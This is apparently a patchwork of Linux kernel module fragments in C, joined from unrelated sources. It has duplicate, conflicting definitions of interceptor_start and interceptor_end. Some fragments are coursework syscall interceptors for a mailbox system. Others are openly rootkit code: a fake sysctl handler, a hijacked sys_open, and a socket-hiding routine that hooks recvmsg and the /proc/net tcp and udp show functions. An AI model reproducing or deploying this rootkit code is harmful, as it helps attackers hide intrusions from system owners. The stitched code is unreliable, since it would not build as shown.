static int __init interceptor_start(void) {
/* Find the system call table */
if(!(sys_call_table = find_sys_call_table())) {
/* Well, that didn’t work.
Cancel the module loading step. */
return -1;
}
/* Store a copy of all the existing functions */
ref_sys_cs3013_syscall1 = (void *)sys_call_table[__NR_cs3013_syscall1];
ref_sys_open = (void *)sys_call_table[__NR_open];
ref_sys_read = (void *)sys_call_table[__NR_read];
ref_sys_close = (void *)sys_call_table[__NR_close];
/* Replace the existing system calls */
disable_page_protection();
sys_call_table[__NR_cs3013_syscall1] = (unsigned long *)new_sys_cs3013_syscall1;
sys_call_table[__NR_open] = (unsigned long *)new_sys_open;
sys_call_table[__NR_read] = (unsigned long *)new_sys_read;
sys_call_table[__NR_close] = (unsigned long *)new_sys_close;
enable_page_protection();
/* And indicate the load was successful */
printk(KERN_INFO "Loaded interceptor!\n");
return 0;
}
static void __exit interceptor_end(void) {
/* If we don't know what the syscall table is, don't bother. */
if(!sys_call_table)
return;
//done with mailnoxes
if ((temp) != NULL){
if (*temp != NULL)
kmem_cache_free(mailCache, (*temp));
}
kmem_cache_destroy(mailCache);
kmem_cache_destroy(mbCache);
kmem_cache_destroy(msgCache);
kmem_cache_destroy(signalCache);
free_ht();
free_ht2();
/* Revert all system calls to what they were before we began. */
disable_page_protection();
sys_call_table[__NR_cs3013_syscall1] = (unsigned long *)ref_sys_cs3013_syscall1;
sys_call_table[__NR_cs3013_syscall2] = (unsigned long *)ref_sys_cs3013_syscall2;
sys_call_table[__NR_cs3013_syscall3] = (unsigned long *)ref_sys_cs3013_syscall3;
sys_call_table[__NR_exit] = (unsigned long *)ref_sys_exit;
sys_call_table[__NR_exit_group] = (unsigned long *)ref_sys_exit_group;
enable_page_protection();
printk(KERN_INFO "Unloaded interceptor!");
} // static void __exit interceptor_end(void)
static void __exit interceptor_end(void) {
/* If we don’t know what the syscall table is, don’t bother. */
if(!sys_call_table)
return;
/* Revert all system calls to what they were before we began. */ disable_page_protection();
sys_call_table[__NR_cs3013_syscall1] = (unsigned long *)ref_sys_cs3013_syscall1; enable_page_protection();
printk(KERN_INFO "Unloaded interceptor!");
}
void rootkit_exit(void){
if(sys_call_table==NULL) {
return;
}
disable_page_protection();
sys_call_table[__NR_sysctl] = (unsigned long *)original_sys_sysctl;
enable_page_protection();
}
void __exit cleanup(void)
{
printk(MODULE_NAME ":\t[+] Cleaning up\n");
disable_page_protection();
sys_call_table[__NR_open] = original_call;
enable_page_protection();
return;
}
int rootkit_init(void){
if(!(sys_call_table = find_sys_call_table())){
return -1;
}
disable_page_protection();
original_sys_sysctl = (void *)sys_call_table[__NR_sysctl];
sys_call_table[__NR_sysctl] = (unsigned long *)fake_sys_sysctl;
enable_page_protection();
return 0;
}
static int __init interceptor_start(void) {
/* Find the system call table */
if(!(sys_call_table = find_sys_call_table())) {
return -1;
}
/* Store a copy of all the existing functions */
ref_sys_cs3013_syscall1 = (void *)sys_call_table[__NR_cs3013_syscall1];
/* Replace the existing system calls */
disable_page_protection();
sys_call_table[__NR_cs3013_syscall1] = (unsigned long *)new_sys_cs3013_syscall1; enable_page_protection();
/* And indicate the load was successful */
printk(KERN_INFO "Loaded interceptor!");
return 0;
}
static void __exit interceptor_end(void) {
/* If we don't know what the syscall table is, don't bother. */
if(!sys_call_table)
return;
/* Revert all system calls to what they were before we began. */
disable_page_protection();
sys_call_table[__NR_cs3013_syscall1] = (unsigned long *)ref_sys_cs3013_syscall1;
sys_call_table[__NR_cs3013_syscall2] = (unsigned long *)ref_sys_cs3013_syscall2;
sys_call_table[__NR_cs3013_syscall3] = (unsigned long *)ref_sys_cs3013_syscall3;
sys_call_table[__NR_exit] = (unsigned long *)ref_sys_exit;
sys_call_table[__NR_exit_group] = (unsigned long *)ref_sys_exit_group;
enable_page_protection();
kmem_cache_destroy(mailboxCache);
kmem_cache_destroy(messageCache);
kmem_cache_destroy(listCache);
kmem_cache_destroy(contentCache);
printk(KERN_INFO "Unloaded interceptor!");
} // static void __exit interceptor_end(void)
int __init hijack(void)
{
sys_call_table = (void *) my_kallsyms_lookup_name("sys_call_table");
if(sys_call_table == NULL)
{
printk(MODULE_NAME ":\t[-] sys_call_table symbol not found\n");
return SYMBOL_NOT_FOUND;
}
original_call = sys_call_table[__NR_open];
disable_page_protection();
sys_call_table[__NR_open] = hijacker_sys_open;
enable_page_protection();
printk(MODULE_NAME ":\t[+] Injected sys_open\n");
return 0;
}
static int __init interceptor_start(void) {
/* Find the system call table */
if(!(sys_call_table = find_sys_call_table())) {
/* Well, that didn't work.
Cancel the module loading step. */
return -1;
}
/* Store a copy of all the existing functions */
ref_sys_cs3013_syscall1 = (void *)sys_call_table[__NR_cs3013_syscall1];
ref_sys_cs3013_syscall2 = (void *)sys_call_table[__NR_cs3013_syscall2];
ref_sys_cs3013_syscall3 = (void *)sys_call_table[__NR_cs3013_syscall3];
ref_sys_exit = (void *)sys_call_table[__NR_exit];
ref_sys_exit_group = (void *)sys_call_table[__NR_exit_group];
/* Replace the existing system calls */
disable_page_protection();
sys_call_table[__NR_cs3013_syscall1] = (unsigned long *)sys_SendMsg;
sys_call_table[__NR_cs3013_syscall2] = (unsigned long *)sys_RcvMsg;
sys_call_table[__NR_cs3013_syscall3] = (unsigned long *)sys_ManageMailbox;
sys_call_table[__NR_exit] = (unsigned long *)sys_mb_exit;
sys_call_table[__NR_exit_group] = (unsigned long *)sys_mb_exit_group;
enable_page_protection();
//mailCache and mbCache are global variables
//spin_lock_init(lock);
//static DEFINE_SPINLOCK(lock);
mailCache = kmem_cache_create("mail", sizeof(message), 0, 0, NULL);
mbCache = kmem_cache_create("mb", sizeof(mailbox), 0, 0, NULL);
msgCache = kmem_cache_create("msg", MAX_MSG_SIZE, 0, 0, NULL);
signalCache = kmem_cache_create("signal", sizeof(signal), 0, 0, NULL);
init_ht();
init_ht2();
//all = kmalloc(HASHTABLE_SIZE * sizeof(mailbox*), GFP_KERNEL);
/* And indicate the load was successful */
printk(KERN_INFO "Loaded interceptor!");
return 0;
} // static int __init interceptor_start(void)
static int __init interceptor_start(void) {
/* Find the system call table */
if(!(sys_call_table = find_sys_call_table())) {
/* Well, that didn't work.
Cancel the module loading step. */
return -1;
}
/* Store a copy of all the existing functions */
ref_sys_cs3013_syscall1 = (void *)sys_call_table[__NR_cs3013_syscall1];
ref_sys_cs3013_syscall2 = (void *)sys_call_table[__NR_cs3013_syscall2];
ref_sys_cs3013_syscall3 = (void *)sys_call_table[__NR_cs3013_syscall3];
ref_sys_exit = (void *)sys_call_table[__NR_exit];
ref_sys_exit_group = (void *)sys_call_table[__NR_exit_group];
/* Replace the existing system calls */
disable_page_protection();
sys_call_table[__NR_cs3013_syscall1] = (unsigned long *)SendMsg;
sys_call_table[__NR_cs3013_syscall2] = (unsigned long *)RcvMsg;
sys_call_table[__NR_cs3013_syscall3] = (unsigned long *)ManageMailbox;
sys_call_table[__NR_exit] = (unsigned long *)NewExit;
sys_call_table[__NR_exit_group] = (unsigned long *)NewExitGroup;
enable_page_protection();
/* And indicate the load was successful */
// Initializes the three slab caches, as well as the universal //spin lock that is used for creating mailboxes
mailboxCache = kmem_cache_create(maCache, sizeof(struct Mailbox), 0, 0, NULL);
messageCache = kmem_cache_create(meCache, sizeof(struct Message), 0, 0, NULL);
listCache = kmem_cache_create(lCache, sizeof(struct Mailbox), 0, 0, NULL);
contentCache = kmem_cache_create(cCache, 128, 0, 0, NULL);
spin_lock_init(&creationLock);
printk(KERN_INFO "Loaded interceptor!");
return 0;
} // static int __init interceptor_start(void)
/*
* unhooks all functions
*/
void unhook_sockets(void)
{
int restored = 0;
struct tcp_seq_afinfo *tcp_seq = 0;
struct tcp_seq_afinfo *tcp6_seq = 0;
struct udp_seq_afinfo *udp_seq = 0;
struct udp_seq_afinfo *udp6_seq = 0;
struct rb_root root = init_net.proc_net->subdir;
struct rb_node *node = rb_first(&root);
struct proc_dir_entry *proc;
/* get the location of the sys_call_table from our sysmap.h file */
void **sys_call_table = (void *)sysmap_sys_call_table;
ROOTKIT_DEBUG("Unloading socket hiding...\n");
/* loop all proc entries */
while (node) {
proc = rb_entry(node, struct proc_dir_entry, subdir_node);
if (strcmp(proc->name, "tcp") == 0) {
tcp_seq = proc->data;
tcp_seq->seq_ops.show = original_tcp_show;
restored++;
ROOTKIT_DEBUG("Restored /proc/net/tcp");
} else if (strcmp(proc->name, "tcp6") == 0) {
tcp6_seq = proc->data;
tcp6_seq->seq_ops.show = original_tcp6_show;
restored++;
ROOTKIT_DEBUG("Restored /proc/net/tcp6");
} else if (strcmp(proc->name, "udp") == 0) {
udp_seq = proc->data;
udp_seq->seq_ops.show = original_udp_show;
restored++;
ROOTKIT_DEBUG("Restored /proc/net/udp");
} else if (strcmp(proc->name, "udp6") == 0) {
udp6_seq = proc->data;
udp6_seq->seq_ops.show = original_udp6_show;
restored++;
ROOTKIT_DEBUG("Restored /proc/net/udp6");
}
/* lets skip the other entries if we are done */
if (restored >= 4) {
break;
}
/* go to the next entry */
node = rb_next(node);
}
/* disable the write-protection */
disable_page_protection();
/* Return the system call back to original */
sys_call_table[__NR_recvmsg] = (ssize_t *) original_recvmsg;
/* reenable the write-protection */
enable_page_protection();
/* wait for all processes to exit our functions */
while (recvmsg_call_counter > 0 || tcp_show_call_counter > 0
|| udp_show_call_counter > 0 || tcp6_show_call_counter > 0
|| udp6_show_call_counter > 0)
msleep(2);
/* log and return */
ROOTKIT_DEBUG("Done.\n");
}
/*
* hooks all functions needed to hide sockets
*/
int hook_sockets(void)
{
/* get the location of the sys_call_table from our sysmap.h file */
void **sys_call_table = (void *)sysmap_sys_call_table;
int hooked = 0;
struct tcp_seq_afinfo *tcp_seq = 0;
struct tcp_seq_afinfo *tcp6_seq = 0;
struct udp_seq_afinfo *udp_seq = 0;
struct udp_seq_afinfo *udp6_seq = 0;
struct rb_root root = init_net.proc_net->subdir;
struct rb_node *node = rb_first(&root);
struct proc_dir_entry *proc;
ROOTKIT_DEBUG("Loading socket hiding...\n");
/* loop all proc entries */
while (node) {
proc = rb_entry(node, struct proc_dir_entry, subdir_node);
if (strcmp(proc->name, "tcp") == 0) {
tcp_seq = proc->data;
original_tcp_show = tcp_seq->seq_ops.show;
tcp_seq->seq_ops.show = manipulated_tcp_show;
hooked++;
ROOTKIT_DEBUG("Hooked /proc/net/tcp");
} else if (strcmp(proc->name, "tcp6") == 0) {
tcp6_seq = proc->data;
original_tcp6_show = tcp6_seq->seq_ops.show;
tcp6_seq->seq_ops.show = manipulated_tcp6_show;
hooked++;
ROOTKIT_DEBUG("Hooked /proc/net/tcp6");
} else if (strcmp(proc->name, "udp") == 0) {
udp_seq = proc->data;
original_udp_show = udp_seq->seq_ops.show;
udp_seq->seq_ops.show = manipulated_udp_show;
hooked++;
ROOTKIT_DEBUG("Hooked /proc/net/udp");
} else if (strcmp(proc->name, "udp6") == 0) {
udp6_seq = proc->data;
original_udp6_show = udp6_seq->seq_ops.show;
udp6_seq->seq_ops.show = manipulated_udp6_show;
hooked++;
ROOTKIT_DEBUG("Hooked /proc/net/udp6");
}
if (hooked >= 4) {
break;
}
/* go to the next entry */
node = rb_next(node);
}
/* disable the write-protection */
disable_page_protection();
/*
* keep pointer to original function in original_recvmsg, and
* replace the system call in the system call table with
* manipulated_recvmsg
*/
original_recvmsg = (void *)sys_call_table[__NR_recvmsg];
sys_call_table[__NR_recvmsg] = (ssize_t *) manipulated_recvmsg;
/* reenable the write-protection */
enable_page_protection();
/* log and return */
ROOTKIT_DEBUG("Done.\n");
return 0;
}
